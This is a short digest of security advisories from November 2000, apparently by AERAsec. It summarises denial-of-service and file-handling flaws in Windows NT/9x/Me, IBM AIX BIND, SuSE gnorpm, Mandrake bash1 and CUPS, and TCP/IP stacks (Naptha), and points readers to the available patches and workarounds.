System: Windows NT 4.0, Windows 9x and Me
Topic: New possibility for Denial-of-Service
Links: MS-091, L-023, ERS-2000.316, WinITSec
ID: ae-200011-005

A denial of service vulnerability affects Windows NT 4.0, Windows 95, 98, 98 Second Edition and Windows Me. By sending a flood of specially formed TCP/IP packets to a machine, an attacker can cause one of two effects. In the most likely case the flood temporarily prevents any networking resources on the affected computer from responding to client requests; as soon as the packets stop arriving, the machine resumes normal operation. In a less likely case the system hangs and remains unresponsive until it is rebooted. The vulnerability can only be exploited if TCP port 139 is open on the target machine. It is recommended to install the patch for Windows NT; for the other systems a workaround has been published.

System: IBM AIX 4.2.x, 4.3.x
Topic: Vulnerabilities in BIND
Links: ERS-2000.005i, L-021
ID: ae-200011-004

The two vulnerabilities in BIND published by ISC affect the AIX name server as well. IBM has now published fixes.

System: SuSE Linux
Topic: Vulnerability in gnorpm
Links: SUSE-040
ID: ae-200011-003

Gnorpm is a graphical user interface to the rpm subsystem for the GNOME desktop. Its handling of temporary files is insecure, so the gnorpm package may overwrite arbitrary files on the system. A workaround and patches are available now.

System: Linux Mandrake
Topic: Vulnerabilities in bash1 and cups
Links: MDKSA-2000:075, MDKSA-2000:070
ID: ae-200011-002

The bash1 shell has the same "<<" vulnerability as tcsh and creates temporary files incorrectly. Previous versions of CUPS made CUPS printers accessible from anywhere on the Internet, and a bug made CUPS broadcast everywhere, keeping dial-on-demand lines open. Mandrake has published fixes now.

System:
Topic: DoS against TCP/IP Stacks
Links: CA-2000-21, S-00-55
ID: ae-200011-001

A variety of denial-of-service vulnerabilities have been explored and documented by BindView's RAZOR Security Team. They allow attackers to consume limited resources on victim machines; RAZOR refers to them as the Naptha vulnerabilities. Many systems are affected; further information is given in the advisory.



(c) 2000-2013 AERAsec Network Services and Security GmbH